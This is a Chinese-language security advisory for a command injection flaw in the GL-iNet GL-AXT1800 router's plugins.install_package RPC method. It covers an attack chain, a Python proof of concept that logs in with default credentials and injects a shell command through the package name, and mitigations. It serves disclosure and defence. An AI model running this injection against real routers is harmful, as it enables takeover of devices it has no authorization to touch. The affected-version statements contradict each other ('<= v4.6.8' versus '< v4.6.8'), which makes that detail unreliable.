CVE-2025-67089 GL-iNet GL-AXT1800路由器命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-67089

漏洞类型

命令注入/远程代码执行

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

GL-iNet GL-AXT1800 路由器固件

漏洞概述

CVE-2025-67089是GL-iNet公司生产的GL-AXT1800路由器固件v4.6.8版本中存在的一个高危命令注入漏洞。该漏洞位于路由器的RPC接口中，具体存在于plugins.install_package方法。该方法在处理软件包安装请求时，未能对用户输入的软件包名称进行充分的输入验证和安全过滤。攻击者通过构造恶意构造的软件包名称参数，可以在服务器端以root权限执行任意系统命令。由于该漏洞可通过网络远程利用，且只需要低权限认证即可实施攻击，因此对使用该设备的用户构成严重安全威胁。攻击成功后将完全接管路由器设备，攻击者可以监控网络流量、植入后门或将其作为进一步攻击内网的跳板。

技术细节

该命令注入漏洞的根本原因在于GL-iNet GL-AXT1800路由器的Web管理界面RPC接口中，plugins.install_package方法对用户输入的软件包名称参数缺少严格的输入过滤机制。攻击者可以在软件包名称字段中注入Shell命令元字符（如分号、管道符、反引号等），当系统处理该输入时，恶意命令将被传递给系统Shell执行。由于路由器固件以root权限运行Web服务，注入的命令将以最高权限执行，实现完整的系统控制。攻击者只需获取路由器Web管理界面的低权限账户凭证，即可通过发送精心构造的RPC请求触发漏洞。整个攻击过程无需用户交互，且可通过互联网远程实施。

攻击链分析

STEP 1

步骤1

攻击者发现或获取GL-iNet GL-AXT1800路由器Web管理界面的低权限账户凭证

STEP 2

步骤2

攻击者登录路由器Web管理界面的RPC接口，建立认证会话

STEP 3

步骤3

攻击者构造包含Shell命令注入payload的软件包名称，发送到plugins.install_package RPC端点

STEP 4

步骤4

路由器RPC服务处理请求时，未过滤的软件包名称参数被传递给系统Shell执行

STEP 5

步骤5

注入的恶意命令以root权限在路由器上执行，攻击者获得完全系统控制权

STEP 6

步骤6

攻击者可植入后门、窃取网络流量、将路由器作为跳板攻击内网其他设备

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-67089 PoC - GL-iNet GL-AXT1800 Command Injection
# Target: GL-iNet GL-AXT1800 Router Firmware <= v4.6.8

target_ip = "192.168.8.1"  # Router IP
username = "admin"
password = "admin"

# Authentication
session = requests.Session()
login_url = f"http://{target_ip}/rpc/login"
login_data = {
    "username": username,
    "password": password
}

response = session.post(login_url, json=login_data)
if response.status_code != 200:
    print("[-] Authentication failed")
    exit(1)

print("[+] Authentication successful")

# Command injection via plugins.install_package RPC method
inject_url = f"http://{target_ip}/rpc/plugins.install_package"
# Inject command: whoami > /tmp/pwned.txt
malicious_package = "; whoami > /tmp/pwned.txt #"

payload = {
    "package": malicious_package
}

print(f"[*] Sending malicious request with payload: {malicious_package}")
response = session.post(inject_url, json=payload)

if response.status_code == 200:
    print("[+] Command injection successful!")
    print("[*] Check /tmp/pwned.txt for output")
else:
    print(f"[-] Request failed with status: {response.status_code}")

影响范围

GL-iNet GL-AXT1800 固件 < v4.6.8

防御指南

临时缓解措施

如果无法立即升级固件，可采取以下临时缓解措施：1) 禁用路由器的远程Web管理功能，仅允许本地访问；2) 修改默认管理端口并使用VPN访问；3) 定期检查系统日志和路由表是否存在异常；4) 使用防火墙限制对路由器管理界面的访问来源IP；5) 监控是否存在异常的RPC请求模式。